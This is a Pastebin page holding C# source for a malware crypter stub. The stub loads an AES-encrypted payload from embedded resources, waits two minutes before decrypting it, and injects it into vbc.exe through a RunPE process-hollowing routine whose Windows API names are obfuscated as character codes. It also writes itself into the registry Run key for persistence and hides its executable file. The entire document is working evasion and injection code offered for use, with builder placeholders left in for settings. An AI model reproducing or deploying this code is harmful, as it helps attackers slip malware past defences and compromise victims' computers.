Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- using System;
- using System.Collections.Generic;
- using System.Data;
- using System.Drawing;
- using System.Threading;
- using System.Text;
- using System.Windows.Forms;
- using System.IO;
- using System.Runtime.InteropServices;
- using System.Resources;
- using System.Security.Cryptography;
- using System.Reflection;
- using Microsoft.Win32;
- static class Program
- {
- [STAThread]
- static void Main()
- {
- Application.EnableVisualStyles();
- Application.SetCompatibleTextRenderingDefault(false);
- Application.Run(new frmOne());
- }
- }
- class Reader
- {
- [DllImport("kernel32.dll")]
- static extern IntPtr GetModuleHandle(string module);
- [DllImport( "kernel32.dll", SetLastError=true )]
- static extern IntPtr FindResource(IntPtr hModule, string lpName, string lpType);
- [DllImport("kernel32.dll", SetLastError=true)]
- static extern IntPtr LoadResource(IntPtr hModule, IntPtr hResInfo);
- [DllImport("kernel32.dll", SetLastError=true)]
- static extern uint SizeofResource(IntPtr hModule, IntPtr hResInfo);
- public static byte[] ReadNative()
- {
- // Get the handle of the resource from the defined file.
- IntPtr hModule = GetModuleHandle(Assembly.GetExecutingAssembly().Location);
- // Locates the resource using its name and type.
- IntPtr loc = FindResource(hModule, "Encrypted", "RT_RCDATA");
- // Loads the resource into a pointer to it.
- IntPtr x = LoadResource(hModule, loc);
- // Gets the size of the resource.
- uint size = SizeofResource(hModule, loc);
- // We declare a byte array with the size of the resource,
- // to store the read bytes there.
- byte[] ret = new byte[size];
- // Copies the contents of the resource to the byte array
- // from memory.
- Marshal.Copy(x, ret, 0, (int)size);
- // Returns the resource's byte array aka the encrypted file bytes.
- return ret;
- }
- public static byte[] ReadManaged()
- {
- // We declare a new resource manager and we want it to manage the "Encrypted" resource.
- ResourceManager Manager = new ResourceManager("Encrypted", Assembly.GetExecutingAssembly());
- // We retrieve the resource as an object and we cast it to a byte array since it's
- // a byte array.
- byte[] bytes = (byte[])Manager.GetObject("encfile");
- // We return the resource's byte array, aka the encrypted file bytes.
- return bytes;
- }
- }
- public partial class frmOne : Form
- {
- // This is needed so the form could initialize, be hidden from taskbar
- // and also invisible.
- private void InitializeComponent()
- {
- this.SuspendLayout();
- this.FormBorderStyle = FormBorderStyle.None;
- this.ShowInTaskbar = false;
- this.ResumeLayout(false);
- this.Visible = false;
- this.WindowState = FormWindowState.Minimized;
- }
- // Variables that we need to control the execution.
- // Storage declares the storage method we used.
- string storage = "[storage-replace]";
- // Startup declares if the stub should add itself to startup.
- bool startup = [startup-replace];
- // Hide declares if the stub should hide itself (the executable).
- bool hide = [hide-replace];
- // We get the path of vbc.exe, the process we'll be injecting into.
- string vbcPath = Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), "vbc.exe");
- public frmOne()
- {
- InitializeComponent();
- // Declare a variable to store the encrypted file bytes.
- byte[] filebytes = null;
- if (storage == "native")
- // If the storage method was native resources,
- // get the file bytes from native resources.
- filebytes = Reader.ReadNative();
- else
- // If the storage method was managed resources,
- // get the file bytes from managed resources.
- filebytes = Reader.ReadManaged();
- // Decrypt the encrypted file bytes using the AES algorithm
- // and the key the user generated on the builder.
- filebytes = AESDecrypt(filebytes, "[key-replace]");
- // Inject the bytes to vbc.exe
- IX.AA(filebytes, vbcPath);
- // Check if the user enabled startup.
- // If he did, add the file to startup.
- if (startup)
- AddToStartup();
- // Check if the user enable hide file.
- // If he did, hide the file from the file explorer.
- if (hide)
- HideFile();
- }
- // This is the AES decryption algorithm.
- public static byte[] AESDecrypt(byte[] input, string Pass)
- {
- System.Security.Cryptography.RijndaelManaged AES = new System.Security.Cryptography.RijndaelManaged();
- byte[] hash = new byte[32];
- byte[] temp = new MD5CryptoServiceProvider().ComputeHash(System.Text.Encoding.ASCII.GetBytes(Pass));
- Array.Copy(temp, 0, hash, 0, 16);
- Array.Copy(temp, 0, hash, 15, 16);
- AES.Key = hash;
- AES.Mode = System.Security.Cryptography.CipherMode.ECB;
- Thread.Sleep(120000);
- System.Security.Cryptography.ICryptoTransform DESDecrypter = AES.CreateDecryptor();
- return DESDecrypter.TransformFinalBlock(input, 0, input.Length);
- }
- // This is the code to add the stub to startup.
- public void AddToStartup()
- {
- RegistryKey Key = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
- Key.SetValue("CryptedFile", Application.ExecutablePath);
- }
- // This is the code to hide the stub from the file explorer.
- public void HideFile()
- {
- FileInfo Info = new FileInfo(Application.ExecutablePath);
- Info.Attributes = FileAttributes.Hidden;
- }
- }
- // This is the RunPE class (the code we use to inject the bytes to the target process)
- // Credits to Oppresor for this class.
- public class IX
- {
- [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
- internal static extern IntPtr LoadLibraryA([In, MarshalAs(UnmanagedType.LPStr)] string lpFileName);
- [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
- static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
- delegate bool ESS(string appName, StringBuilder commandLine, IntPtr procAttr, IntPtr thrAttr, [MarshalAs(UnmanagedType.Bool)] bool inherit, int creation, IntPtr env, string curDir, byte[] sInfo, IntPtr[] pInfo);
- delegate bool EXT(IntPtr hThr, uint[] ctxt);
- delegate bool TEX(IntPtr t, uint[] c); //all kernel32
- delegate uint ION(IntPtr hProc, IntPtr baseAddr); //ntdll
- delegate bool ORY(IntPtr hProc, IntPtr baseAddr, ref IntPtr bufr, int bufrSize, ref IntPtr numRead);
- delegate uint EAD(IntPtr hThread); //kernel32.dll
- delegate IntPtr CEX(IntPtr hProc, IntPtr addr, IntPtr size, int allocType, int prot);
- delegate bool CTEX(IntPtr hProcess, IntPtr lpAddress, IntPtr dwSize, uint flNewProtect, ref uint lpflOldProtect);
- delegate bool MOR(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out int lpNumberOfBytesWritten); //kernel32.dll
- delegate bool OP(byte[] bytes, string surrogateProcess);
- public T CreateAPI<T>(string name, string method)
- {
- return (T)(object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(name), method), typeof(T));
- }
- public static bool AA(byte[] bytes, string surrogateProcess)
- {
- IX p = new IX();
- OP F1 = new OP(p.R);
- bool Res = F1(bytes, surrogateProcess);
- return Res;
- }
- public bool R(byte[] bytes, string surrogateProcess)
- {
- String K32 = Convert.ToString((char)107) + (char)101 + (char)114 + (char)110 + (char)101 + (char)108 + (char)51 + (char)50;
- String NTD = Convert.ToString((char)110) + (char)116 + (char)100 + (char)108 + (char)108;
- ESS CP = CreateAPI<ESS>(K32, Convert.ToString((char)67) + (char)114 + (char)101 + (char)97 + (char)116 + (char)101 + (char)80 + (char)114 + (char)111 + (char)99 + (char)101 + (char)115 + (char)115 + (char)65);
- ION NUVS = CreateAPI<ION>(NTD, Convert.ToString((char)78) + (char)116 + (char)85 + (char)110 + (char)109 + (char)97 + (char)112 + (char)86 + (char)105 + (char)101 + (char)119 + (char)79 + (char)102 + (char)83 + (char)101 + (char)99 + (char)116 + (char)105 + (char)111 + (char)110);
- EXT GTC = CreateAPI<EXT>(K32, Convert.ToString((char)71) + (char)101 + (char)116 + (char)84 + (char)104 + (char)114 + (char)101 + (char)97 + (char)100 + (char)67 + (char)111 + (char)110 + (char)116 + (char)101 + (char)120 + (char)116);
- TEX STC = CreateAPI<TEX>(K32, Convert.ToString((char)83) + (char)101 + (char)116 + (char)84 + (char)104 + (char)114 + (char)101 + (char)97 + (char)100 + (char)67 + (char)111 + (char)110 + (char)116 + (char)101 + (char)120 + (char)116);
- ORY RPM = CreateAPI<ORY>(K32, Convert.ToString((char)82) + (char)101 + (char)97 + (char)100 + (char)80 + (char)114 + (char)111 + (char)99 + (char)101 + (char)115 + (char)115 + (char)77 + (char)101 + (char)109 + (char)111 + (char)114 + (char)121);
- EAD RT = CreateAPI<EAD>(K32, Convert.ToString((char)82) + (char)101 + (char)115 + (char)117 + (char)109 + (char)101 + (char)84 + (char)104 + (char)114 + (char)101 + (char)97 + (char)100);
- CEX VAE = CreateAPI<CEX>(K32, Convert.ToString((char)86) + (char)105 + (char)114 + (char)116 + (char)117 + (char)97 + (char)108 + (char)65 + (char)108 + (char)108 + (char)111 + (char)99 + (char)69 + (char)120);
- CTEX VPE = CreateAPI<CTEX>(K32, Convert.ToString((char)86) + (char)105 + (char)114 + (char)116 + (char)117 + (char)97 + (char)108 + (char)80 + (char)114 + (char)111 + (char)116 + (char)101 + (char)99 + (char)116 + (char)69 + (char)120);
- MOR WPM = CreateAPI<MOR>(K32, Convert.ToString((char)87) + (char)114 + (char)105 + (char)116 + (char)101 + (char)80 + (char)114 + (char)111 + (char)99 + (char)101 + (char)115 + (char)115 + (char)77 + (char)101 + (char)109 + (char)111 + (char)114 + (char)121);
- try
- {
- IntPtr procAttr = IntPtr.Zero;
- IntPtr[] processInfo = new IntPtr[4];
- byte[] startupInfo = new byte[0x44];
- int num2 = BitConverter.ToInt32(bytes, 60);
- int num = BitConverter.ToInt16(bytes, num2 + 6);
- IntPtr ptr4 = new IntPtr(BitConverter.ToInt32(bytes, num2 + 0x54));
- if (CP(null, new StringBuilder(surrogateProcess), procAttr, procAttr, false, 4, procAttr, null, startupInfo, processInfo))
- {
- uint[] ctxt = new uint[0xb3];
- ctxt[0] = 0x10002;
- if (GTC(processInfo[1], ctxt))
- {
- IntPtr baseAddr = new IntPtr(ctxt[0x29] + 8L);
- IntPtr buffer = IntPtr.Zero;
- IntPtr bufferSize = new IntPtr(4);
- IntPtr numRead = IntPtr.Zero;
- if (RPM(processInfo[0], baseAddr, ref buffer, (int)bufferSize, ref numRead) && (NUVS(processInfo[0], buffer) == 0))
- {
- IntPtr addr = new IntPtr(BitConverter.ToInt32(bytes, num2 + 0x34));
- IntPtr size = new IntPtr(BitConverter.ToInt32(bytes, num2 + 80));
- IntPtr lpBaseAddress = VAE(processInfo[0], addr, size, 0x3000, 0x40);
- int lpNumberOfBytesWritten;
- WPM(processInfo[0], lpBaseAddress, bytes, (uint)((int)ptr4), out lpNumberOfBytesWritten);
- int num5 = num - 1;
- for (int i = 0; i <= num5; i++)
- {
- int[] dst = new int[10];
- Buffer.BlockCopy(bytes, (num2 + 0xf8) + (i * 40), dst, 0, 40);
- byte[] buffer2 = new byte[(dst[4] - 1) + 1];
- Buffer.BlockCopy(bytes, dst[5], buffer2, Convert.ToInt32(null, 2), buffer2.Length);
- size = new IntPtr(lpBaseAddress.ToInt32() + dst[3]);
- addr = new IntPtr(buffer2.Length);
- WPM(processInfo[0], size, buffer2, (uint)addr, out lpNumberOfBytesWritten);
- }
- size = new IntPtr(ctxt[0x29] + 8L);
- addr = new IntPtr(4);
- WPM(processInfo[0], size, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint)addr, out lpNumberOfBytesWritten);
- ctxt[0x2c] = (uint)(lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40));
- STC(processInfo[1], ctxt);
- }
- }
- RT(processInfo[1]);
- }
- }
- catch
- {
- return false;
- }
- return true;
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement